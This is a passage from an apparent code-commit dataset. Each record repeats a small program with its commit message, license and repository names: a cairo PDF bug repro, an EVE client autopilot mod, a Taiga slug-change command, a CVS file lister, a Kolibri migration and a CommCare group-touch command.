cr.rectangle(0, 0, 400, 400)
cr.clip()
def clear(cr):
cr.set_operator(cairo.OPERATOR_CLEAR)
cr.paint()
# init image
src = cairo.ImageSurface(cairo.FORMAT_ARGB32, 100, 100)
cr = cairo.Context(src)
cr.set_source_rgb(1, 1, 1)
cr.paint()
# init pdf
pdf = cairo.PDFSurface("out.pdf", 400, 400)
cr = cairo.Context(pdf)
cr.rotate(math.pi / 4)
# page 1, push paint pop paint
fill_background(cr)
cr.push_group()
paint_from_image(cr, src)
cr.pop_group_to_source()
cr.paint()
cr.show_page()
# page 2, push clear paint pop paint
fill_background(cr)
cr.push_group()
clear(cr)
paint_from_image(cr, src)
cr.pop_group_to_source()
cr.paint()
cr.show_page()
# page 3, push clip paint pop paint
fill_background(cr)
cr.push_group()
clip(cr)
paint_from_image(cr, src)
cr.pop_group_to_source()
cr.paint()
cr.show_page()
# page 4, push clip clear paint pop paint
fill_background(cr)
cr.push_group()
clip(cr)
clear(cr)
paint_from_image(cr, src)
cr.pop_group_to_source()
cr.paint()
cr.show_page()
# done
pdf.finish()
|
Add python program to illustrate strange cairo bug with group and pdf
|
Add python program to illustrate strange cairo bug with group and pdf
|
Python
|
lgpl-2.1
|
openslide/openslide,openslide/openslide,openslide/openslide,openslide/openslide
|
Add python program to illustrate strange cairo bug with group and pdf
|
import cairo
import math
def fill_background(cr):
cr.set_source_rgb(0, 0, 1)
cr.paint()
def paint_from_image(cr, src):
cr.set_operator(cairo.OPERATOR_SATURATE)
cr.set_source_surface(src, 0, 0)
cr.paint()
cr.set_source_surface(src, 100, 0)
cr.paint()
cr.set_source_surface(src, 200, 0)
cr.paint()
cr.set_source_surface(src, 300, 0)
cr.paint()
def clip(cr):
cr.rectangle(0, 0, 400, 400)
cr.clip()
def clear(cr):
cr.set_operator(cairo.OPERATOR_CLEAR)
cr.paint()
# init image
src = cairo.ImageSurface(cairo.FORMAT_ARGB32, 100, 100)
cr = cairo.Context(src)
cr.set_source_rgb(1, 1, 1)
cr.paint()
# init pdf
pdf = cairo.PDFSurface("out.pdf", 400, 400)
cr = cairo.Context(pdf)
cr.rotate(math.pi / 4)
# page 1, push paint pop paint
fill_background(cr)
cr.push_group()
paint_from_image(cr, src)
cr.pop_group_to_source()
cr.paint()
cr.show_page()
# page 2, push clear paint pop paint
fill_background(cr)
cr.push_group()
clear(cr)
paint_from_image(cr, src)
cr.pop_group_to_source()
cr.paint()
cr.show_page()
# page 3, push clip paint pop paint
fill_background(cr)
cr.push_group()
clip(cr)
paint_from_image(cr, src)
cr.pop_group_to_source()
cr.paint()
cr.show_page()
# page 4, push clip clear paint pop paint
fill_background(cr)
cr.push_group()
clip(cr)
clear(cr)
paint_from_image(cr, src)
cr.pop_group_to_source()
cr.paint()
cr.show_page()
# done
pdf.finish()
|
<commit_before><commit_msg>Add python program to illustrate strange cairo bug with group and pdf<commit_after>
|
import cairo
import math
def fill_background(cr):
cr.set_source_rgb(0, 0, 1)
cr.paint()
def paint_from_image(cr, src):
cr.set_operator(cairo.OPERATOR_SATURATE)
cr.set_source_surface(src, 0, 0)
cr.paint()
cr.set_source_surface(src, 100, 0)
cr.paint()
cr.set_source_surface(src, 200, 0)
cr.paint()
cr.set_source_surface(src, 300, 0)
cr.paint()
def clip(cr):
cr.rectangle(0, 0, 400, 400)
cr.clip()
def clear(cr):
cr.set_operator(cairo.OPERATOR_CLEAR)
cr.paint()
# init image
src = cairo.ImageSurface(cairo.FORMAT_ARGB32, 100, 100)
cr = cairo.Context(src)
cr.set_source_rgb(1, 1, 1)
cr.paint()
# init pdf
pdf = cairo.PDFSurface("out.pdf", 400, 400)
cr = cairo.Context(pdf)
cr.rotate(math.pi / 4)
# page 1, push paint pop paint
fill_background(cr)
cr.push_group()
paint_from_image(cr, src)
cr.pop_group_to_source()
cr.paint()
cr.show_page()
# page 2, push clear paint pop paint
fill_background(cr)
cr.push_group()
clear(cr)
paint_from_image(cr, src)
cr.pop_group_to_source()
cr.paint()
cr.show_page()
# page 3, push clip paint pop paint
fill_background(cr)
cr.push_group()
clip(cr)
paint_from_image(cr, src)
cr.pop_group_to_source()
cr.paint()
cr.show_page()
# page 4, push clip clear paint pop paint
fill_background(cr)
cr.push_group()
clip(cr)
clear(cr)
paint_from_image(cr, src)
cr.pop_group_to_source()
cr.paint()
cr.show_page()
# done
pdf.finish()
|
Add python program to illustrate strange cairo bug with group and pdfimport cairo
import math
def fill_background(cr):
cr.set_source_rgb(0, 0, 1)
cr.paint()
def paint_from_image(cr, src):
cr.set_operator(cairo.OPERATOR_SATURATE)
cr.set_source_surface(src, 0, 0)
cr.paint()
cr.set_source_surface(src, 100, 0)
cr.paint()
cr.set_source_surface(src, 200, 0)
cr.paint()
cr.set_source_surface(src, 300, 0)
cr.paint()
def clip(cr):
cr.rectangle(0, 0, 400, 400)
cr.clip()
def clear(cr):
cr.set_operator(cairo.OPERATOR_CLEAR)
cr.paint()
# init image
src = cairo.ImageSurface(cairo.FORMAT_ARGB32, 100, 100)
cr = cairo.Context(src)
cr.set_source_rgb(1, 1, 1)
cr.paint()
# init pdf
pdf = cairo.PDFSurface("out.pdf", 400, 400)
cr = cairo.Context(pdf)
cr.rotate(math.pi / 4)
# page 1, push paint pop paint
fill_background(cr)
cr.push_group()
paint_from_image(cr, src)
cr.pop_group_to_source()
cr.paint()
cr.show_page()
# page 2, push clear paint pop paint
fill_background(cr)
cr.push_group()
clear(cr)
paint_from_image(cr, src)
cr.pop_group_to_source()
cr.paint()
cr.show_page()
# page 3, push clip paint pop paint
fill_background(cr)
cr.push_group()
clip(cr)
paint_from_image(cr, src)
cr.pop_group_to_source()
cr.paint()
cr.show_page()
# page 4, push clip clear paint pop paint
fill_background(cr)
cr.push_group()
clip(cr)
clear(cr)
paint_from_image(cr, src)
cr.pop_group_to_source()
cr.paint()
cr.show_page()
# done
pdf.finish()
|
<commit_before><commit_msg>Add python program to illustrate strange cairo bug with group and pdf<commit_after>import cairo
import math
def fill_background(cr):
cr.set_source_rgb(0, 0, 1)
cr.paint()
def paint_from_image(cr, src):
cr.set_operator(cairo.OPERATOR_SATURATE)
cr.set_source_surface(src, 0, 0)
cr.paint()
cr.set_source_surface(src, 100, 0)
cr.paint()
cr.set_source_surface(src, 200, 0)
cr.paint()
cr.set_source_surface(src, 300, 0)
cr.paint()
def clip(cr):
cr.rectangle(0, 0, 400, 400)
cr.clip()
def clear(cr):
cr.set_operator(cairo.OPERATOR_CLEAR)
cr.paint()
# init image
src = cairo.ImageSurface(cairo.FORMAT_ARGB32, 100, 100)
cr = cairo.Context(src)
cr.set_source_rgb(1, 1, 1)
cr.paint()
# init pdf
pdf = cairo.PDFSurface("out.pdf", 400, 400)
cr = cairo.Context(pdf)
cr.rotate(math.pi / 4)
# page 1, push paint pop paint
fill_background(cr)
cr.push_group()
paint_from_image(cr, src)
cr.pop_group_to_source()
cr.paint()
cr.show_page()
# page 2, push clear paint pop paint
fill_background(cr)
cr.push_group()
clear(cr)
paint_from_image(cr, src)
cr.pop_group_to_source()
cr.paint()
cr.show_page()
# page 3, push clip paint pop paint
fill_background(cr)
cr.push_group()
clip(cr)
paint_from_image(cr, src)
cr.pop_group_to_source()
cr.paint()
cr.show_page()
# page 4, push clip clear paint pop paint
fill_background(cr)
cr.push_group()
clip(cr)
clear(cr)
paint_from_image(cr, src)
cr.pop_group_to_source()
cr.paint()
cr.show_page()
# done
pdf.finish()
|
|
08362c2f45f749f1942d3317ce8b64f64abca23f
|
mods/Autopilot0/__init__.py
|
mods/Autopilot0/__init__.py
|
import util
util.Moniker.CmdWarpToStuffAutopilot = lambda s, x: (uicore.uilib.RegisterAppEventTime(), s.CmdWarpToStuff("item", x, minRange = 0))
|
Add mod: Autopilot to 0
|
Add mod: Autopilot to 0
|
Python
|
mit
|
EVEModX/Mods
|
Add mod: Autopilot to 0
|
import util
util.Moniker.CmdWarpToStuffAutopilot = lambda s, x: (uicore.uilib.RegisterAppEventTime(), s.CmdWarpToStuff("item", x, minRange = 0))
|
<commit_before><commit_msg>Add mod: Autopilot to 0<commit_after>
|
import util
util.Moniker.CmdWarpToStuffAutopilot = lambda s, x: (uicore.uilib.RegisterAppEventTime(), s.CmdWarpToStuff("item", x, minRange = 0))
|
Add mod: Autopilot to 0import util
util.Moniker.CmdWarpToStuffAutopilot = lambda s, x: (uicore.uilib.RegisterAppEventTime(), s.CmdWarpToStuff("item", x, minRange = 0))
|
<commit_before><commit_msg>Add mod: Autopilot to 0<commit_after>import util
util.Moniker.CmdWarpToStuffAutopilot = lambda s, x: (uicore.uilib.RegisterAppEventTime(), s.CmdWarpToStuff("item", x, minRange = 0))
|
|
17462a888a8ea5c2f7fdfa25cdb0ae07054c0753
|
taiga/projects/management/commands/change_project_slug.py
|
taiga/projects/management/commands/change_project_slug.py
|
# -*- coding: utf-8 -*-
# Copyright (C) 2014-2016 Andrey Antukh <niwi@niwi.nz>
# Copyright (C) 2014-2016 Jesús Espino <jespinog@gmail.com>
# Copyright (C) 2014-2016 David Barragán <bameda@dbarragan.com>
# Copyright (C) 2014-2016 Alejandro Alonso <alejandro.alonso@kaleidos.net>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.core.management.base import BaseCommand
from django.core.management.base import CommandError
from django.test.utils import override_settings
from taiga.base.utils.slug import slugify_uniquely
from taiga.projects.models import Project
from taiga.projects.history.models import HistoryEntry
from taiga.timeline.management.commands.rebuild_timeline import generate_timeline
class Command(BaseCommand):
help = 'Change the project slug from a new one'
def add_arguments(self, parser):
parser.add_argument('current_slug', help="The current project slug")
parser.add_argument('new_slug', help="The new project slug")
@override_settings(DEBUG=False)
def handle(self, *args, **options):
current_slug = options["current_slug"]
new_slug = options["new_slug"]
try:
project = Project.objects.get(slug=current_slug)
except Project.DoesNotExist:
raise CommandError("There is no project with the slug '{}'".format(current_slug))
slug = slugify_uniquely(new_slug, Project)
if slug != new_slug:
raise CommandError("Invalid new slug, maybe you can try with '{}'".format(slug))
# Change slug
self.stdout.write(self.style.SUCCESS("-> Change slug to '{}'.".format(slug)))
project.slug = slug
project.save()
# Reset diff cache in history entries
self.stdout.write(self.style.SUCCESS("-> Reset value_diff cache for history entries."))
HistoryEntry.objects.filter(project=project).update(values_diff_cache=None)
# Regenerate timeline
self.stdout.write(self.style.SUCCESS("-> Regenerate timeline entries."))
generate_timeline(None, None, project.id)
|
Create command to change project slug
|
[Backport] Create command to change project slug
|
Python
|
agpl-3.0
|
xdevelsistemas/taiga-back-community,dayatz/taiga-back,xdevelsistemas/taiga-back-community,dayatz/taiga-back,taigaio/taiga-back,taigaio/taiga-back,dayatz/taiga-back,taigaio/taiga-back,xdevelsistemas/taiga-back-community
|
[Backport] Create command to change project slug
|
# -*- coding: utf-8 -*-
# Copyright (C) 2014-2016 Andrey Antukh <niwi@niwi.nz>
# Copyright (C) 2014-2016 Jesús Espino <jespinog@gmail.com>
# Copyright (C) 2014-2016 David Barragán <bameda@dbarragan.com>
# Copyright (C) 2014-2016 Alejandro Alonso <alejandro.alonso@kaleidos.net>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.core.management.base import BaseCommand
from django.core.management.base import CommandError
from django.test.utils import override_settings
from taiga.base.utils.slug import slugify_uniquely
from taiga.projects.models import Project
from taiga.projects.history.models import HistoryEntry
from taiga.timeline.management.commands.rebuild_timeline import generate_timeline
class Command(BaseCommand):
help = 'Change the project slug from a new one'
def add_arguments(self, parser):
parser.add_argument('current_slug', help="The current project slug")
parser.add_argument('new_slug', help="The new project slug")
@override_settings(DEBUG=False)
def handle(self, *args, **options):
current_slug = options["current_slug"]
new_slug = options["new_slug"]
try:
project = Project.objects.get(slug=current_slug)
except Project.DoesNotExist:
raise CommandError("There is no project with the slug '{}'".format(current_slug))
slug = slugify_uniquely(new_slug, Project)
if slug != new_slug:
raise CommandError("Invalid new slug, maybe you can try with '{}'".format(slug))
# Change slug
self.stdout.write(self.style.SUCCESS("-> Change slug to '{}'.".format(slug)))
project.slug = slug
project.save()
# Reset diff cache in history entries
self.stdout.write(self.style.SUCCESS("-> Reset value_diff cache for history entries."))
HistoryEntry.objects.filter(project=project).update(values_diff_cache=None)
# Regenerate timeline
self.stdout.write(self.style.SUCCESS("-> Regenerate timeline entries."))
generate_timeline(None, None, project.id)
|
<commit_before><commit_msg>[Backport] Create command to change project slug<commit_after>
|
# -*- coding: utf-8 -*-
# Copyright (C) 2014-2016 Andrey Antukh <niwi@niwi.nz>
# Copyright (C) 2014-2016 Jesús Espino <jespinog@gmail.com>
# Copyright (C) 2014-2016 David Barragán <bameda@dbarragan.com>
# Copyright (C) 2014-2016 Alejandro Alonso <alejandro.alonso@kaleidos.net>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.core.management.base import BaseCommand
from django.core.management.base import CommandError
from django.test.utils import override_settings
from taiga.base.utils.slug import slugify_uniquely
from taiga.projects.models import Project
from taiga.projects.history.models import HistoryEntry
from taiga.timeline.management.commands.rebuild_timeline import generate_timeline
class Command(BaseCommand):
help = 'Change the project slug from a new one'
def add_arguments(self, parser):
parser.add_argument('current_slug', help="The current project slug")
parser.add_argument('new_slug', help="The new project slug")
@override_settings(DEBUG=False)
def handle(self, *args, **options):
current_slug = options["current_slug"]
new_slug = options["new_slug"]
try:
project = Project.objects.get(slug=current_slug)
except Project.DoesNotExist:
raise CommandError("There is no project with the slug '{}'".format(current_slug))
slug = slugify_uniquely(new_slug, Project)
if slug != new_slug:
raise CommandError("Invalid new slug, maybe you can try with '{}'".format(slug))
# Change slug
self.stdout.write(self.style.SUCCESS("-> Change slug to '{}'.".format(slug)))
project.slug = slug
project.save()
# Reset diff cache in history entries
self.stdout.write(self.style.SUCCESS("-> Reset value_diff cache for history entries."))
HistoryEntry.objects.filter(project=project).update(values_diff_cache=None)
# Regenerate timeline
self.stdout.write(self.style.SUCCESS("-> Regenerate timeline entries."))
generate_timeline(None, None, project.id)
|
[Backport] Create command to change project slug# -*- coding: utf-8 -*-
# Copyright (C) 2014-2016 Andrey Antukh <niwi@niwi.nz>
# Copyright (C) 2014-2016 Jesús Espino <jespinog@gmail.com>
# Copyright (C) 2014-2016 David Barragán <bameda@dbarragan.com>
# Copyright (C) 2014-2016 Alejandro Alonso <alejandro.alonso@kaleidos.net>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.core.management.base import BaseCommand
from django.core.management.base import CommandError
from django.test.utils import override_settings
from taiga.base.utils.slug import slugify_uniquely
from taiga.projects.models import Project
from taiga.projects.history.models import HistoryEntry
from taiga.timeline.management.commands.rebuild_timeline import generate_timeline
class Command(BaseCommand):
help = 'Change the project slug from a new one'
def add_arguments(self, parser):
parser.add_argument('current_slug', help="The current project slug")
parser.add_argument('new_slug', help="The new project slug")
@override_settings(DEBUG=False)
def handle(self, *args, **options):
current_slug = options["current_slug"]
new_slug = options["new_slug"]
try:
project = Project.objects.get(slug=current_slug)
except Project.DoesNotExist:
raise CommandError("There is no project with the slug '{}'".format(current_slug))
slug = slugify_uniquely(new_slug, Project)
if slug != new_slug:
raise CommandError("Invalid new slug, maybe you can try with '{}'".format(slug))
# Change slug
self.stdout.write(self.style.SUCCESS("-> Change slug to '{}'.".format(slug)))
project.slug = slug
project.save()
# Reset diff cache in history entries
self.stdout.write(self.style.SUCCESS("-> Reset value_diff cache for history entries."))
HistoryEntry.objects.filter(project=project).update(values_diff_cache=None)
# Regenerate timeline
self.stdout.write(self.style.SUCCESS("-> Regenerate timeline entries."))
generate_timeline(None, None, project.id)
|
<commit_before><commit_msg>[Backport] Create command to change project slug<commit_after># -*- coding: utf-8 -*-
# Copyright (C) 2014-2016 Andrey Antukh <niwi@niwi.nz>
# Copyright (C) 2014-2016 Jesús Espino <jespinog@gmail.com>
# Copyright (C) 2014-2016 David Barragán <bameda@dbarragan.com>
# Copyright (C) 2014-2016 Alejandro Alonso <alejandro.alonso@kaleidos.net>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.core.management.base import BaseCommand
from django.core.management.base import CommandError
from django.test.utils import override_settings
from taiga.base.utils.slug import slugify_uniquely
from taiga.projects.models import Project
from taiga.projects.history.models import HistoryEntry
from taiga.timeline.management.commands.rebuild_timeline import generate_timeline
class Command(BaseCommand):
help = 'Change the project slug from a new one'
def add_arguments(self, parser):
parser.add_argument('current_slug', help="The current project slug")
parser.add_argument('new_slug', help="The new project slug")
@override_settings(DEBUG=False)
def handle(self, *args, **options):
current_slug = options["current_slug"]
new_slug = options["new_slug"]
try:
project = Project.objects.get(slug=current_slug)
except Project.DoesNotExist:
raise CommandError("There is no project with the slug '{}'".format(current_slug))
slug = slugify_uniquely(new_slug, Project)
if slug != new_slug:
raise CommandError("Invalid new slug, maybe you can try with '{}'".format(slug))
# Change slug
self.stdout.write(self.style.SUCCESS("-> Change slug to '{}'.".format(slug)))
project.slug = slug
project.save()
# Reset diff cache in history entries
self.stdout.write(self.style.SUCCESS("-> Reset value_diff cache for history entries."))
HistoryEntry.objects.filter(project=project).update(values_diff_cache=None)
# Regenerate timeline
self.stdout.write(self.style.SUCCESS("-> Regenerate timeline entries."))
generate_timeline(None, None, project.id)
|
|
73c4c6fb87f33dadd9220e2ebca3ed5d275be47d
|
Tools/scripts/cvsfiles.py
|
Tools/scripts/cvsfiles.py
|
#! /usr/bin/env python
"""Create a list of files that are mentioned in CVS directories."""
import os
import sys
import string
def main():
args = sys.argv[1:]
if args:
for arg in args:
process(arg)
else:
process(".")
def process(dir):
cvsdir = 0
subdirs = []
files = []
names = os.listdir(dir)
for name in names:
fullname = os.path.join(dir, name)
if name == "CVS":
cvsdir = fullname
else:
if os.path.isdir(fullname):
subdirs.append(fullname)
else:
files.append(fullname)
if cvsdir:
entries = os.path.join(cvsdir, "Entries")
for e in open(entries).readlines():
words = string.split(e, '/')
if words[0] == '' and words[1:]:
name = words[1]
print os.path.join(dir, name)
for sub in subdirs:
process(sub)
main()
|
Print a list of files under CVS.
|
Print a list of files under CVS.
|
Python
|
mit
|
sk-/python2.7-type-annotator,sk-/python2.7-type-annotator,sk-/python2.7-type-annotator
|
Print a list of files under CVS.
|
#! /usr/bin/env python
"""Create a list of files that are mentioned in CVS directories."""
import os
import sys
import string
def main():
args = sys.argv[1:]
if args:
for arg in args:
process(arg)
else:
process(".")
def process(dir):
cvsdir = 0
subdirs = []
files = []
names = os.listdir(dir)
for name in names:
fullname = os.path.join(dir, name)
if name == "CVS":
cvsdir = fullname
else:
if os.path.isdir(fullname):
subdirs.append(fullname)
else:
files.append(fullname)
if cvsdir:
entries = os.path.join(cvsdir, "Entries")
for e in open(entries).readlines():
words = string.split(e, '/')
if words[0] == '' and words[1:]:
name = words[1]
print os.path.join(dir, name)
for sub in subdirs:
process(sub)
main()
|
<commit_before><commit_msg>Print a list of files under CVS.<commit_after>
|
#! /usr/bin/env python
"""Create a list of files that are mentioned in CVS directories."""
import os
import sys
import string
def main():
args = sys.argv[1:]
if args:
for arg in args:
process(arg)
else:
process(".")
def process(dir):
cvsdir = 0
subdirs = []
files = []
names = os.listdir(dir)
for name in names:
fullname = os.path.join(dir, name)
if name == "CVS":
cvsdir = fullname
else:
if os.path.isdir(fullname):
subdirs.append(fullname)
else:
files.append(fullname)
if cvsdir:
entries = os.path.join(cvsdir, "Entries")
for e in open(entries).readlines():
words = string.split(e, '/')
if words[0] == '' and words[1:]:
name = words[1]
print os.path.join(dir, name)
for sub in subdirs:
process(sub)
main()
|
Print a list of files under CVS.#! /usr/bin/env python
"""Create a list of files that are mentioned in CVS directories."""
import os
import sys
import string
def main():
args = sys.argv[1:]
if args:
for arg in args:
process(arg)
else:
process(".")
def process(dir):
cvsdir = 0
subdirs = []
files = []
names = os.listdir(dir)
for name in names:
fullname = os.path.join(dir, name)
if name == "CVS":
cvsdir = fullname
else:
if os.path.isdir(fullname):
subdirs.append(fullname)
else:
files.append(fullname)
if cvsdir:
entries = os.path.join(cvsdir, "Entries")
for e in open(entries).readlines():
words = string.split(e, '/')
if words[0] == '' and words[1:]:
name = words[1]
print os.path.join(dir, name)
for sub in subdirs:
process(sub)
main()
|
<commit_before><commit_msg>Print a list of files under CVS.<commit_after>#! /usr/bin/env python
"""Create a list of files that are mentioned in CVS directories."""
import os
import sys
import string
def main():
args = sys.argv[1:]
if args:
for arg in args:
process(arg)
else:
process(".")
def process(dir):
cvsdir = 0
subdirs = []
files = []
names = os.listdir(dir)
for name in names:
fullname = os.path.join(dir, name)
if name == "CVS":
cvsdir = fullname
else:
if os.path.isdir(fullname):
subdirs.append(fullname)
else:
files.append(fullname)
if cvsdir:
entries = os.path.join(cvsdir, "Entries")
for e in open(entries).readlines():
words = string.split(e, '/')
if words[0] == '' and words[1:]:
name = words[1]
print os.path.join(dir, name)
for sub in subdirs:
process(sub)
main()
|
|
7d65295224fbeb61ae4116e67ab8f2b704112480
|
kolibri/auth/migrations/0003_classroom_facility_learnergroup.py
|
kolibri/auth/migrations/0003_classroom_facility_learnergroup.py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-02-03 23:46
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('kolibriauth', '0002_auto_20160203_1516'),
]
operations = [
migrations.CreateModel(
name='Classroom',
fields=[
],
options={
'proxy': True,
},
bases=('kolibriauth.collection',),
),
migrations.CreateModel(
name='Facility',
fields=[
],
options={
'proxy': True,
},
bases=('kolibriauth.collection',),
),
migrations.CreateModel(
name='LearnerGroup',
fields=[
],
options={
'proxy': True,
},
bases=('kolibriauth.collection',),
),
]
|
Create Collection proxy model migration
|
Create Collection proxy model migration
|
Python
|
mit
|
jtamiace/kolibri,indirectlylit/kolibri,benjaoming/kolibri,66eli77/kolibri,mrpau/kolibri,christianmemije/kolibri,benjaoming/kolibri,rtibbles/kolibri,mrpau/kolibri,aronasorman/kolibri,66eli77/kolibri,benjaoming/kolibri,indirectlylit/kolibri,aronasorman/kolibri,jayoshih/kolibri,christianmemije/kolibri,indirectlylit/kolibri,jtamiace/kolibri,ralphiee22/kolibri,lyw07/kolibri,jamalex/kolibri,rtibbles/kolibri,rtibbles/kolibri,mrpau/kolibri,MingDai/kolibri,christianmemije/kolibri,jayoshih/kolibri,aronasorman/kolibri,jayoshih/kolibri,ralphiee22/kolibri,66eli77/kolibri,whitzhu/kolibri,learningequality/kolibri,ralphiee22/kolibri,whitzhu/kolibri,lyw07/kolibri,jtamiace/kolibri,jonboiser/kolibri,jonboiser/kolibri,jayoshih/kolibri,learningequality/kolibri,lyw07/kolibri,whitzhu/kolibri,DXCanas/kolibri,MingDai/kolibri,lyw07/kolibri,christianmemije/kolibri,MCGallaspy/kolibri,MCGallaspy/kolibri,DXCanas/kolibri,MingDai/kolibri,jamalex/kolibri,MCGallaspy/kolibri,benjaoming/kolibri,DXCanas/kolibri,jtamiace/kolibri,rtibbles/kolibri,learningequality/kolibri,aronasorman/kolibri,jonboiser/kolibri,jamalex/kolibri,whitzhu/kolibri,jamalex/kolibri,mrpau/kolibri,66eli77/kolibri,ralphiee22/kolibri,learningequality/kolibri,MingDai/kolibri,jonboiser/kolibri,indirectlylit/kolibri,DXCanas/kolibri
|
Create Collection proxy model migration
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-02-03 23:46
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('kolibriauth', '0002_auto_20160203_1516'),
]
operations = [
migrations.CreateModel(
name='Classroom',
fields=[
],
options={
'proxy': True,
},
bases=('kolibriauth.collection',),
),
migrations.CreateModel(
name='Facility',
fields=[
],
options={
'proxy': True,
},
bases=('kolibriauth.collection',),
),
migrations.CreateModel(
name='LearnerGroup',
fields=[
],
options={
'proxy': True,
},
bases=('kolibriauth.collection',),
),
]
|
<commit_before><commit_msg>Create Collection proxy model migration<commit_after>
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-02-03 23:46
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('kolibriauth', '0002_auto_20160203_1516'),
]
operations = [
migrations.CreateModel(
name='Classroom',
fields=[
],
options={
'proxy': True,
},
bases=('kolibriauth.collection',),
),
migrations.CreateModel(
name='Facility',
fields=[
],
options={
'proxy': True,
},
bases=('kolibriauth.collection',),
),
migrations.CreateModel(
name='LearnerGroup',
fields=[
],
options={
'proxy': True,
},
bases=('kolibriauth.collection',),
),
]
|
Create Collection proxy model migration# -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-02-03 23:46
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('kolibriauth', '0002_auto_20160203_1516'),
]
operations = [
migrations.CreateModel(
name='Classroom',
fields=[
],
options={
'proxy': True,
},
bases=('kolibriauth.collection',),
),
migrations.CreateModel(
name='Facility',
fields=[
],
options={
'proxy': True,
},
bases=('kolibriauth.collection',),
),
migrations.CreateModel(
name='LearnerGroup',
fields=[
],
options={
'proxy': True,
},
bases=('kolibriauth.collection',),
),
]
|
<commit_before><commit_msg>Create Collection proxy model migration<commit_after># -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-02-03 23:46
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('kolibriauth', '0002_auto_20160203_1516'),
]
operations = [
migrations.CreateModel(
name='Classroom',
fields=[
],
options={
'proxy': True,
},
bases=('kolibriauth.collection',),
),
migrations.CreateModel(
name='Facility',
fields=[
],
options={
'proxy': True,
},
bases=('kolibriauth.collection',),
),
migrations.CreateModel(
name='LearnerGroup',
fields=[
],
options={
'proxy': True,
},
bases=('kolibriauth.collection',),
),
]
|
|
ebc708440cdf2ed46863cbe4ed595e2689f8fe71
|
corehq/apps/groups/management/commands/touch_group_docs.py
|
corehq/apps/groups/management/commands/touch_group_docs.py
|
from django.core.management.base import LabelCommand
from dimagi.utils.couch.database import iter_docs
from dimagi.utils.chunked import chunked
from corehq.apps.groups.models import Group
class Command(LabelCommand):
def handle(self, *args, **options):
db = Group.get_db()
def get_doc_ids():
for result in db.view(
'groups/all_groups',
reduce=False):
yield result['id']
CHUNK_SIZE = 100
for i, docs in enumerate(chunked(iter_docs(db, get_doc_ids()), CHUNK_SIZE)):
print i * CHUNK_SIZE
db.bulk_save([Group.wrap(doc) for doc in docs])
|
Add management command to touch all group docs
|
Add management command to touch all group docs
|
Python
|
bsd-3-clause
|
dimagi/commcare-hq,dimagi/commcare-hq,dimagi/commcare-hq,SEL-Columbia/commcare-hq,SEL-Columbia/commcare-hq,qedsoftware/commcare-hq,qedsoftware/commcare-hq,dimagi/commcare-hq,qedsoftware/commcare-hq,puttarajubr/commcare-hq,puttarajubr/commcare-hq,qedsoftware/commcare-hq,puttarajubr/commcare-hq,puttarajubr/commcare-hq,qedsoftware/commcare-hq,SEL-Columbia/commcare-hq,dimagi/commcare-hq
|
Add management command to touch all group docs
|
from django.core.management.base import LabelCommand
from dimagi.utils.couch.database import iter_docs
from dimagi.utils.chunked import chunked
from corehq.apps.groups.models import Group
class Command(LabelCommand):
def handle(self, *args, **options):
db = Group.get_db()
def get_doc_ids():
for result in db.view(
'groups/all_groups',
reduce=False):
yield result['id']
CHUNK_SIZE = 100
for i, docs in enumerate(chunked(iter_docs(db, get_doc_ids()), CHUNK_SIZE)):
print i * CHUNK_SIZE
db.bulk_save([Group.wrap(doc) for doc in docs])
|
<commit_before><commit_msg>Add management command to touch all group docs<commit_after>
|
from django.core.management.base import LabelCommand
from dimagi.utils.couch.database import iter_docs
from dimagi.utils.chunked import chunked
from corehq.apps.groups.models import Group
class Command(LabelCommand):
def handle(self, *args, **options):
db = Group.get_db()
def get_doc_ids():
for result in db.view(
'groups/all_groups',
reduce=False):
yield result['id']
